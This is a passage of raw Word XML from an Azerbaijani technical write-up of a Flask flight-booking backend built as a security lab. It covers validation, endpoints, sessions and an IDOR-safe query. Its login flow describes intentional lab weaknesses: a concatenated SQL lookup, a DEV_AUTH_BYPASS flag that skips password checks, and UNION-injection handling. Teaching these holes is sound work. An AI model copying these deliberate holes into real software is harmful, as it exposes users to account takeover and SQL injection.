              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="EEF5FB" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">FLASK_SECRET_KEY kritik əhəmiyyət daşıyır: Flask session cookie-lərini bu açar ilə HMAC imzalayır. Açar bilinərsə, hücumçu istənilən user_id-yə sahib saxta cookie yarada bilər. Generasiya üçün: python -c "import secrets; print(secrets.token_hex(32))"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4. Giriş Validasiyası</w:t>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Server istifadəçidən gələn hər məlumatı qəbul etməzdən əvvəl yoxlayır (server-side validation). Layihədə üç əsas validasiya funksiyası var:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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846"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Funksiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3200"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Yoxladığı</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2846"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Qeyd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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validate_email(email)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Min uzunluq (5), @ işarəsi, domain nöqtəsi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2846"/>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Sadə yoxlama; real layihədə email-validator kitabxanası tövsiyə olunur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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validate_password_strength(pw)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Min 8 simvol, ən az 1 hərf, 1 rəqəm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2846"/>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Tuple[bool, str] qaytarır — xəta mesajı daxildir</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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login_input_bounds(email, pw)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="32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Max uzunluq (254/256), null-byte (\x00)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2846"/>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RFC 5321 standartı; null-byte injection qarşısı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Backend: Əsas Komponentlər</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1. API Endpointlər</w:t>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Layihədə 11 endpoint var. Hər biri @app.route() dekoratoru ilə Flask-a qeydiyyatdan keçirilir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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600"/>
        <w:gridCol w:w="2246"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2500"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1500"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP Metodu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2600"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Funksiya</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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1F3864"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sessiya?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/register</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_register()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Xeyr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_login()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Xeyr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/logout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_logout()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Xeyr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_me()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/me/bookings</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_me_bookings()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/me/profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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PATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_me_profile()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_upload()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/uploads/mine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_uploads_mine()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/admin/reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_admin_reports()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli + Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/transactions/&lt;id&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_transaction_by_id()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Bəli</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="25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/api/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="15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GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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api_health()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2246"/>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Xeyr</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2. Giriş Axını — api_login()</w:t>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api_login() layihənin ən mürəkkəb endpointidir. Həm təhlükəsiz, həm də lab (zəif) yolları ehtiva edir. Aşağıdakı şəkildə axının sxemi verilmişdir:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. JSON gövdədən email + password oxunur</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2. login_input_bounds() → uzunluq + null-byte yoxlaması</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3. INSECURE_SQL_DB aktiv isə: _user_lookup_concat(email_raw)  ← LAB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">   Deyilsə:                   user_get_by_email(email)        ← TƏHLÜKƏSİZ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4. DEV_AUTH_BYPASS aktiv isə: pw_ok = True                   ← LAB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">   Deyilsə:                   check_password_hash(ph, pw)    ← TƏHLÜKƏSİZ</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5. UNION injection ilə saxta id gəlibsə: query_probe cavabı  ← LAB</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6. Normal giriş: session["user_id"] = row["id"] → cookie imzalanır</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>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Eyni xəta mesajının ("E-poçt və ya parol səhvdir") hər iki uğursuz hal üçün istifadə edilməsi vacibdir — bu user enumeration hücumlarının qarşısını alır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3. Sessiya İdarəetməsi</w:t>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Flask-ın session obyekti server tərəfli deyil — imzalanmış cookie-dir. session["user_id"] = 7 deyəndə Flask bu məlumatı FLASK_SECRET_KEY ilə imzalayıb brauzərə cookie kimi göndərir. Növbəti sorğuda brauzer cookie-ni geri göndərir, Flask onu açır. Vercel mühitindəki cookie konfiqurasiyası:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — sətir 70-73</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if _is_vercel_runtime():</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    app.config["SESSION_COOKIE_SECURE"]   = True   # Yalnız HTTPS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    app.config["SESSION_COOKIE_HTTPONLY"] = True   # JS ilə oxunmasın</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    app.config["SESSION_COOKIE_SAMESITE"] = "Lax"  # CSRF-ə qarşı</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4. IDOR Müdafiəsi — api_transaction_by_id()</w:t>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Bu endpoint Insecure Direct Object Reference (IDOR) hücumuna qarşı düzgün müdafiə nümunəsidir. Yalnız tid parametrini yoxlamaq yetərli deyil; sorğu həm id-ni, həm də sessiyadakı user_id-ni yoxlamalıdır:</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8846"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8846"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:left w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:bottom w:val="single" w:color="B8CCE4" w:sz="4"/>
              <w:right w:val="single" w:color="B8CCE4" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="F0F4FA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># backend/app.py — düzgün müdafiə</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">cur.execute("""</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    SELECT t.id, ...</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    FROM transactions t</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    JOIN users u   ON u.id = t.user_id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    JOIN flights f ON f.id = t.flight_id</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">    WHERE t.id      = %s    ← URL parametri</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">      AND t.user_id = %s    ← Sessiyadakı istifadəçi!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">""", (tid, uid))</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"># Başqasının sifarişi → NULL → 404 ✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
